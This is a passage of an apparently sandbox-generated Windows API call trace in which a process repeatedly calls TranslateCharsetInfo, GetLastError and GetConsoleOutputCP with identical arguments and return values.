0x1b5 [0053.468] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.468] GetLastError () returned 0xcb [0053.468] GetConsoleOutputCP () returned 0x1b5 [0053.468] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.468] GetLastError () returned 0xcb [0053.468] GetConsoleOutputCP () returned 0x1b5 [0053.468] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.468] GetLastError () returned 0xcb [0053.468] GetConsoleOutputCP () returned 0x1b5 [0053.468] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.468] GetLastError () returned 0xcb [0053.468] GetConsoleOutputCP () returned 0x1b5 [0053.468] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.468] GetLastError () returned 0xcb [0053.468] GetConsoleOutputCP () returned 0x1b5 [0053.468] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.468] GetLastError () returned 0xcb [0053.468] GetConsoleOutputCP () returned 0x1b5 [0053.469] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.469] GetLastError () returned 0xcb [0053.469] GetConsoleOutputCP () returned 0x1b5 [0053.469] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.469] GetLastError () returned 0xcb [0053.469] GetConsoleOutputCP () returned 0x1b5 [0053.469] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.469] GetLastError () returned 0xcb [0053.469] GetConsoleOutputCP () returned 0x1b5 [0053.469] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.469] GetLastError () returned 0xcb [0053.469] GetConsoleOutputCP () returned 0x1b5 [0053.469] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.469] GetLastError () returned 0xcb [0053.469] GetConsoleOutputCP () returned 0x1b5 [0053.469] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.469] GetLastError () returned 0xcb [0053.469] GetConsoleOutputCP () returned 0x1b5 [0053.469] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.469] GetLastError () returned 0xcb [0053.469] GetConsoleOutputCP () returned 0x1b5 [0053.470] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.470] GetLastError () returned 0xcb [0053.470] GetConsoleOutputCP () returned 0x1b5 [0053.470] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.470] GetLastError () returned 0xcb [0053.470] GetConsoleOutputCP () returned 0x1b5 [0053.470] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.470] GetLastError () returned 0xcb [0053.470] GetConsoleOutputCP () returned 0x1b5 [0053.470] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.470] GetLastError () returned 0xcb [0053.470] GetConsoleOutputCP () returned 0x1b5 [0053.470] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.470] GetLastError () returned 0xcb [0053.470] GetConsoleOutputCP () returned 0x1b5 [0053.470] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.470] GetLastError () returned 0xcb [0053.470] GetConsoleOutputCP () returned 0x1b5 [0053.471] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.471] GetLastError () returned 0xcb [0053.471] GetConsoleOutputCP () returned 0x1b5 [0053.471] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.471] GetLastError () returned 0xcb [0053.471] GetConsoleOutputCP () returned 0x1b5 [0053.471] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.471] GetLastError () returned 0xcb [0053.471] GetConsoleOutputCP () returned 0x1b5 [0053.471] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.471] GetLastError () returned 0xcb [0053.471] GetConsoleOutputCP () returned 0x1b5 [0053.471] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.471] GetLastError () returned 0xcb [0053.471] GetConsoleOutputCP () returned 0x1b5 [0053.471] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.471] GetLastError () returned 0xcb [0053.471] GetConsoleOutputCP () returned 0x1b5 [0053.471] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.471] GetLastError () returned 0xcb [0053.471] GetConsoleOutputCP () returned 0x1b5 [0053.472] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.472] GetLastError () returned 0xcb [0053.472] GetConsoleOutputCP () returned 0x1b5 [0053.472] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.472] GetLastError () returned 0xcb [0053.472] GetConsoleOutputCP () returned 0x1b5 [0053.472] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.472] GetLastError () returned 0xcb [0053.472] GetConsoleOutputCP () returned 0x1b5 [0053.472] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.472] GetLastError () returned 0xcb [0053.472] GetConsoleOutputCP () returned 0x1b5 [0053.472] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.472] GetLastError () returned 0xcb [0053.472] GetConsoleOutputCP () returned 0x1b5 [0053.472] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.472] GetLastError () returned 0xcb [0053.472] GetConsoleOutputCP () returned 0x1b5 [0053.473] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.473] GetLastError () returned 0xcb [0053.473] GetConsoleOutputCP () returned 0x1b5 [0053.473] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.473] GetLastError () returned 0xcb [0053.473] GetConsoleOutputCP () returned 0x1b5 [0053.473] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.473] GetLastError () returned 0xcb [0053.473] GetConsoleOutputCP () returned 0x1b5 [0053.473] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.473] GetLastError () returned 0xcb [0053.473] GetConsoleOutputCP () returned 0x1b5 [0053.473] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.473] GetLastError () returned 0xcb [0053.473] GetConsoleOutputCP () returned 0x1b5 [0053.473] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.473] GetLastError () returned 0xcb [0053.473] GetConsoleOutputCP () returned 0x1b5 [0053.473] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.473] GetLastError () returned 0xcb [0053.473] GetConsoleOutputCP () returned 0x1b5 [0053.474] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.474] GetLastError () returned 0xcb [0053.474] GetConsoleOutputCP () returned 0x1b5 [0053.474] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.474] GetLastError () returned 0xcb [0053.474] GetConsoleOutputCP () returned 0x1b5 [0053.474] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.474] GetLastError () returned 0xcb [0053.474] GetConsoleOutputCP () returned 0x1b5 [0053.474] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.474] GetLastError () returned 0xcb [0053.474] GetConsoleOutputCP () returned 0x1b5 [0053.474] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.474] GetLastError () returned 0xcb [0053.474] GetConsoleOutputCP () returned 0x1b5 [0053.474] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.474] GetLastError () returned 0xcb [0053.474] GetConsoleOutputCP () returned 0x1b5 [0053.474] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.475] GetLastError () returned 0xcb [0053.475] GetConsoleOutputCP () returned 0x1b5 [0053.475] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.475] GetLastError () returned 0xcb [0053.475] GetConsoleOutputCP () returned 0x1b5 [0053.475] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.475] GetLastError () returned 0xcb [0053.475] GetConsoleOutputCP () returned 0x1b5 [0053.475] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.475] GetLastError () returned 0xcb [0053.475] GetConsoleOutputCP () returned 0x1b5 [0053.475] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.475] GetLastError () returned 0xcb [0053.475] GetConsoleOutputCP () returned 0x1b5 [0053.475] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.475] GetLastError () returned 0xcb [0053.475] GetConsoleOutputCP () returned 0x1b5 [0053.475] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.475] GetLastError () returned 0xcb [0053.475] GetConsoleOutputCP () returned 0x1b5 [0053.476] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.476] GetLastError () returned 0xcb [0053.476] GetConsoleOutputCP () returned 0x1b5 [0053.476] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.476] GetLastError () returned 0xcb [0053.476] GetConsoleOutputCP () returned 0x1b5 [0053.476] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.476] GetLastError () returned 0xcb [0053.476] GetConsoleOutputCP () returned 0x1b5 [0053.476] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.476] GetLastError () returned 0xcb [0053.476] GetConsoleOutputCP () returned 0x1b5 [0053.476] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.476] GetLastError () returned 0xcb [0053.476] GetConsoleOutputCP () returned 0x1b5 [0053.476] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.476] GetLastError () returned 0xcb [0053.476] GetConsoleOutputCP () returned 0x1b5 [0053.476] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.476] GetLastError () returned 0xcb [0053.476] GetConsoleOutputCP () returned 0x1b5 [0053.477] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.477] GetLastError () returned 0xcb [0053.477] GetConsoleOutputCP () returned 0x1b5 [0053.477] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.477] GetLastError () returned 0xcb [0053.477] GetConsoleOutputCP () returned 0x1b5 [0053.477] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.477] GetLastError () returned 0xcb [0053.477] GetConsoleOutputCP () returned 0x1b5 [0053.477] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.477] GetLastError () returned 0xcb [0053.477] GetConsoleOutputCP () returned 0x1b5 [0053.477] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.477] GetLastError () returned 0xcb [0053.477] GetConsoleOutputCP () returned 0x1b5 [0053.477] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.477] GetLastError () returned 0xcb [0053.477] GetConsoleOutputCP () returned 0x1b5 [0053.478] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.478] GetLastError () returned 0xcb [0053.478] GetConsoleOutputCP () returned 0x1b5 [0053.478] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.478] GetLastError () returned 0xcb [0053.478] GetConsoleOutputCP () returned 0x1b5 [0053.478] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.478] GetLastError () returned 0xcb [0053.478] GetConsoleOutputCP () returned 0x1b5 [0053.478] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.478] GetLastError () returned 0xcb [0053.478] GetConsoleOutputCP () returned 0x1b5 [0053.478] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.478] GetLastError () returned 0xcb [0053.478] GetConsoleOutputCP () returned 0x1b5 [0053.478] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.478] GetLastError () returned 0xcb [0053.478] GetConsoleOutputCP () returned 0x1b5 [0053.478] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.478] GetLastError () returned 0xcb [0053.478] GetConsoleOutputCP () returned 0x1b5 [0053.479] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.479] GetLastError () returned 0xcb [0053.479] GetConsoleOutputCP () returned 0x1b5 [0053.479] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.479] GetLastError () returned 0xcb [0053.479] GetConsoleOutputCP () returned 0x1b5 [0053.479] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.479] GetLastError () returned 0xcb [0053.479] GetConsoleOutputCP () returned 0x1b5 [0053.479] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.479] GetLastError () returned 0xcb [0053.479] GetConsoleOutputCP () returned 0x1b5 [0053.479] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.479] GetLastError () returned 0xcb [0053.479] GetConsoleOutputCP () returned 0x1b5 [0053.479] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.479] GetLastError () returned 0xcb [0053.479] GetConsoleOutputCP () returned 0x1b5 [0053.479] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.480] GetLastError () returned 0xcb [0053.480] GetConsoleOutputCP () returned 0x1b5 [0053.480] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.480] GetLastError () returned 0xcb [0053.480] GetConsoleOutputCP () returned 0x1b5 [0053.480] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.480] GetLastError () returned 0xcb [0053.480] GetConsoleOutputCP () returned 0x1b5 [0053.480] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.480] GetLastError () returned 0xcb [0053.480] GetConsoleOutputCP () returned 0x1b5 [0053.480] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.480] GetLastError () returned 0xcb [0053.480] GetConsoleOutputCP () returned 0x1b5 [0053.480] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.480] GetLastError () returned 0xcb [0053.480] GetConsoleOutputCP () returned 0x1b5 [0053.480] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.480] GetLastError () returned 0xcb [0053.480] GetConsoleOutputCP () returned 0x1b5 [0053.481] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.481] GetLastError () returned 0xcb [0053.481] GetConsoleOutputCP () returned 0x1b5 [0053.481] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.481] GetLastError () returned 0xcb [0053.481] GetConsoleOutputCP () returned 0x1b5 [0053.481] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.481] GetLastError () returned 0xcb [0053.481] GetConsoleOutputCP () returned 0x1b5 [0053.481] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.481] GetLastError () returned 0xcb [0053.481] GetConsoleOutputCP () returned 0x1b5 [0053.481] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.481] GetLastError () returned 0xcb [0053.481] GetConsoleOutputCP () returned 0x1b5 [0053.481] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.481] GetLastError () returned 0xcb [0053.481] GetConsoleOutputCP () returned 0x1b5 [0053.481] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.481] GetLastError () returned 0xcb [0053.482] GetConsoleOutputCP () returned 0x1b5 [0053.482] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.482] GetLastError () returned 0xcb [0053.482] GetConsoleOutputCP () returned 0x1b5 [0053.482] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.482] GetLastError () returned 0xcb [0053.482] GetConsoleOutputCP () returned 0x1b5 [0053.482] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.482] GetLastError () returned 0xcb [0053.482] GetConsoleOutputCP () returned 0x1b5 [0053.482] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.482] GetLastError () returned 0xcb [0053.482] GetConsoleOutputCP () returned 0x1b5 [0053.482] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.482] GetLastError () returned 0xcb [0053.482] GetConsoleOutputCP () returned 0x1b5 [0053.482] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.482] GetLastError () returned 0xcb [0053.482] GetConsoleOutputCP () returned 0x1b5 [0053.483] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.483] GetLastError () returned 0xcb [0053.483] GetConsoleOutputCP () returned 0x1b5 [0053.483] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.483] GetLastError () returned 0xcb [0053.483] GetConsoleOutputCP () returned 0x1b5 [0053.483] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.483] GetLastError () returned 0xcb [0053.483] GetConsoleOutputCP () returned 0x1b5 [0053.483] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.483] GetLastError () returned 0xcb [0053.483] GetConsoleOutputCP () returned 0x1b5 [0053.483] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.483] GetLastError () returned 0xcb [0053.483] GetConsoleOutputCP () returned 0x1b5 [0053.483] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.484] GetLastError () returned 0xcb [0053.484] GetConsoleOutputCP () returned 0x1b5 [0053.484] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.484] GetLastError () returned 0xcb [0053.484] GetConsoleOutputCP () returned 0x1b5 [0053.484] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.484] GetLastError () returned 0xcb [0053.484] GetConsoleOutputCP () returned 0x1b5 [0053.484] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.484] GetLastError () returned 0xcb [0053.484] GetConsoleOutputCP () returned 0x1b5 [0053.484] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.484] GetLastError () returned 0xcb [0053.484] GetConsoleOutputCP () returned 0x1b5 [0053.484] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.484] GetLastError () returned 0xcb [0053.484] GetConsoleOutputCP () returned 0x1b5 [0053.484] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.484] GetLastError () returned 0xcb [0053.484] GetConsoleOutputCP () returned 0x1b5 [0053.485] TranslateCharsetInfo (in: lpSrc=0x1b5, 